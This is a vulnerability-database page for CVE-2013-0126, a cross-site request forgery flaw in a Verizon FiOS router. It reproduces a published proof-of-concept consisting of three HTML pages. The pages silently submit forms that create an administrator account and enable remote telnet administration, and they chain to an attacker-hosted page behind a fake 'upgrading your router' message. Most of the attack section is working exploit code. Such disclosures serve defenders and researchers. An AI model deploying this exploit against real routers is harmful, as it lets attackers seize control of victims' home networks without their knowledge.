Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Verizon Fios Router MI424WR-GEN3I - CSRF Vulnerability

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 32 Views

Verizon Fios Router MI424WR-GEN3I CSRF Vulnerability discovered in Jan 2013 by Jacob Holcomb. Exploit allows adding admin user, enable remote administration

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Verizon Fios Router MI424WR-GEN3I - CSRF Vulnerability
19 Mar 201300:00
zdt
0day.today		Verizon Fios Router MI424WR-GEN3I CSRF Vulnerability
20 Mar 201300:00
zdt
ATTACKERKB		CVE-2013-0126
21 Mar 201320:55
attackerkb
CVE		CVE-2013-0126
21 Mar 201320:00
cve
Cvelist		CVE-2013-0126
21 Mar 201320:00
cvelist
Exploit DB		Verizon Fios Router MI424WR-GEN3I - Cross-Site Request Forgery
19 Mar 201300:00
exploitdb
EUVD		EUVD-2013-0169
7 Oct 202500:30
euvd
exploitpack		Verizon Fios Router MI424WR-GEN3I - Cross-Site Request Forgery
19 Mar 201300:00
exploitpack
NVD		CVE-2013-0126
21 Mar 201320:55
nvd
Packet Storm		Verizon Fios Router MI424WR-GEN3I CSRF
19 Mar 201300:00
packetstorm
Rows per page

                                                # Exploit Title: Verizon Fios Router CSRF Admin Shell 
# Date: Discovered and reported January 2013
# Author: Jacob Holcomb/Gimppy - Security Analyst @ Independent Security Evaluators
# Software: Verizon FIOS Router - Firmware 40.19.36 (http://verizon.com)
# CVE: CVE-2013-0126
# Advisory/Video: http://infosec42.blogspot.com/2013/03/verizon-fios-router-csrf-cve-2013-0126.html

US CERT Disclosure: http://www.kb.cert.org/vuls/id/278204

Exploit Code:

HTML FILE #1

<html>
<title>Cisco Verizon FIOS CSRF - Adding Administrator User</title>
<!--Cisco Model: MI424WR-GEN3I -->
<!--Firmware Version: 40.19.36 -->
<h1>Please sit tight while we upgrade your router</h1>

<body>

<form name="verizonCisco" action="http://192.168.1.1/index.cgi" method="post">
<input type="hidden" name="active_page" value="101"/>
<input type="hidden" name="page_title" value="User Settings"/>
<input type="hidden" name="mimic_button_field" value="submit_button_submit: .."/>
<input type="hidden" name="button_value" value="."/>
<input type="hidden" name="strip_page_top" value="0"/>
<input type="hidden" name="user_id" value="-1"/>
<input type="hidden" name="fullname_defval" value=""/>
<input type="hidden" name="fullname" value="g42"/>
<input type="hidden" name="username_defval" value=""/>
<input type="hidden" name="username" value="G42"/>
<input type="hidden" name="user_level" value="2"/>
<input type="hidden" name="email_system_notify_level" value="15"/>
<input type="hidden" name="email_security_notify_level" value="15"/>
</form>

<script>
function CSRF1() {window.open("http://10.0.1.101/verizonFIOS2.html");};window.setTimeout(CSRF1,1000)
function CSRF2() {document.verizonCisco.submit();};window.setTimeout(CSRF2,1000)
</script>

</body>
</html>

HTML FILE #2

<html>
<title>Cisco Verizon FIOS CSRF2 - Add User w/ No Pass Confirmation</title>

<body>

<form name="verizonCiscoC" action="http://192.168.1.1/index.cgi" method="post">
<input type="hidden" name="active_page" value="101"/>
<input type="hidden" name="page_title" value="User Settings"/>
<input type="hidden" name="mimic_button_field" value="submit_button_confirm_submit: .."/>
<input type="hidden" name="button_value" value="."/>
<input type="hidden" name="strip_page_top" value="0"/>
</form>

<script>
function CSRF1() {window.open("http://10.0.1.101/verizonFIOS3.html");};window.setTimeout(CSRF1,0500)
function CSRF2() {document.verizonCiscoC.submit();};window.setTimeout(CSRF2,0500)
</script>

</body>
</html>

HTML FILE #3

 <html>
<title>Cisco Verizon FIOS CSRF3 - Enable Remote Administration</title>

<body>

<form name="verizonCiscoRemote" action="http://192.168.1.1/index.cgi" method="post">
<input type="hidden" name="active_page" value="9078"/>
<input type="hidden" name="active_page_str" value="page_remote_admin"/>
<input type="hidden" name="page_title" value="Remote Administration"/>
<input type="hidden" name="mimic_button_field" value="submit_button_submit: .."/>
<input type="hidden" name="button_value" value=""/>
<input type="hidden" name="strip_page_top" value="0"/>
<input type="hidden" name="is_telnet_primary" value="1"/>
<input type="hidden" name="is_telnet_primary_defval" value="0"/>
<input type="hidden" name="is_telnet_secondary_defval" value="0"/>
<input type="hidden" name="is_telnet_ssl_defval" value="0"/>
<input type="hidden" name="is_http_primary_defval" value="0"/>
<input type="hidden" name="is_http_secondary_defval" value="0"/>
<input type="hidden" name="is_https_primary_defval" value="0"/>
<input type="hidden" name="is_https_secondary_defval" value="0"/>
<input type="hidden" name="is_diagnostics_icmp_defval" value="0"/>
<input type="hidden" name="is_diagnostics_traceroute_defval" value="0"/>
<input type="hidden" name="is_telnet_secondary" value="1"/>
</form>

<script>
function CSRF1() {document.verizonCiscoRemote.submit();};window.setTimeout(CSRF1,0000)
</script>

</body>
</html>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
01 Jul 2014 00:00Current
0.1Low risk
Vulners AI Score0.1
EPSS0.00938
verizon fios routercsrf vulnerabilityfirmware 40.19.36jacob holcombexploitadding administrator userremote administration
32